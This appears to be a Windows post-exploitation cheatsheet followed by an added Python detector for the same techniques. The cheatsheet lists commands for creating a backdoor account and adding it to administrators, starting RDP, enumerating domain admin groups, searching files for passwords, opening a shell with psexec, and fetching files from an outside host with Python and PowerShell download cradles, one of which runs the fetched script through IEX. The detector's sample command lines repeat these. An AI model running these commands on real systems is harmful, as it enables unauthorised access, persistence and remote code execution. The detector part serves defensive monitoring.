Windows-cheatsheet



systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

findstr /s /n /i /p /c:"password" *.txt


===================================================================
Using NET
net user [username] [password] /add

net localgroup administrators [username] /add

net start TermService (starts the RDP service)

netsh firewall show state

net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
(/domain sends the query to the domain controller; without it, net group only runs on a DC)


===================================================================
Use Python like wget
C:\python26\python.exe -c "import urllib2; u = urllib2.urlopen('http://10.11.0.108:4445/35936.py'); localFile = open('local_file', 'wb'); localFile.write(u.read()); localFile.close()"
(open the output in binary mode so downloaded binaries are not mangled by newline translation)

===================================================================
Getting a shell as a specific user

WMI


SMB

Impacket
/usr/share/doc/python-impacket/examples/psexec.py DOMAIN/USER@IP cmd.exe


===================================================================
Transferring files

Powershell

powershell -c "(New-Object Net.WebClient).DownloadFile('http://whatever.com/file.exe', 'file.exe')"

OR

powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://whatever.com:1234/file.exe')"

(DownloadFile writes to disk and returns nothing, so wrapping it in IEX does nothing; DownloadString takes a single URL argument and IEX runs the returned text as PowerShell, so that URL has to serve a script rather than a binary. Wrap the whole command in double quotes so the single quotes inside survive the shell.)


OR

powershell IWR -Uri http://whatever.com/file.exe -OutFile file.exe
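Added defensive aid, not part of the original cheatsheet: a small Python detector that runs patterns for the commands on this page (account creation, admin group changes, RDP service start, PowerShell and Python download cradles) over constructed process-creation command lines of the kind a defender pulls from Sysmon Event ID 1 or Security event 4688. The sample lines, rule names and the `net1` alias handling are assumptions made for this example.

```python
import re

# Constructed sample command lines (CommandLine field of Sysmon EID 1 / Security 4688).
# Not real telemetry; they mirror the commands on this cheatsheet plus two benign ones.
SAMPLE_COMMAND_LINES = [
    'net user /add backdoor P@ssw0rd',
    'net localgroup administrators backdoor /add',
    'net start TermService',
    'net group "Domain Admins" /domain',
    'powershell IEX(New-Object Net.WebClient).DownloadString("http://whatever.com:1234/file.exe")',
    'powershell IWR -Uri http://whatever.com/file.exe -OutFile file.exe',
    r'''C:\python26\python.exe -c "import urllib2; u = urllib2.urlopen('http://10.11.0.108:4445/35936.py')"''',
    'net user',      # benign: just lists local accounts
    'systeminfo',    # benign: host enumeration on its own is too noisy to alert on
]

# One regex per technique; case-insensitive, and 'net1' is the alias net.exe falls back to.
RULES = {
    'local_account_created':      re.compile(r'\bnet1?\s+user\b.*\s/add\b', re.I),
    'added_to_local_admins':      re.compile(r'\bnet1?\s+localgroup\s+administrators\b.*\s/add\b', re.I),
    'rdp_service_started':        re.compile(r'\bnet1?\s+start\s+TermService\b', re.I),
    'privileged_group_enum':      re.compile(r'\bnet1?\s+group\s+"?(Domain|Enterprise) Admins"?', re.I),
    'powershell_download_cradle': re.compile(
        r'(DownloadString|DownloadFile|Invoke-WebRequest|\bIWR\b|Invoke-Expression|\bIEX\b)', re.I),
    'python_http_fetch':          re.compile(r'python.*\burllib2?\b.*\burlopen\(', re.I),
}


def detect(command_lines):
    """Return (rule_name, command_line) for every rule that matches a line."""
    hits = []
    for line in command_lines:
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((name, line))
    return hits


def summarize(command_lines):
    """Count matches per rule; handy for a quick triage view of a host's process log."""
    counts = {}
    for name, _ in detect(command_lines):
        counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == '__main__':
    for name, line in detect(SAMPLE_COMMAND_LINES):
        print(f'[{name}] {line}')
```

Each rule is narrow on purpose: a bare `net user` or `systeminfo` produces no hit, so the detector stays quiet on routine administration.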

==================================================================
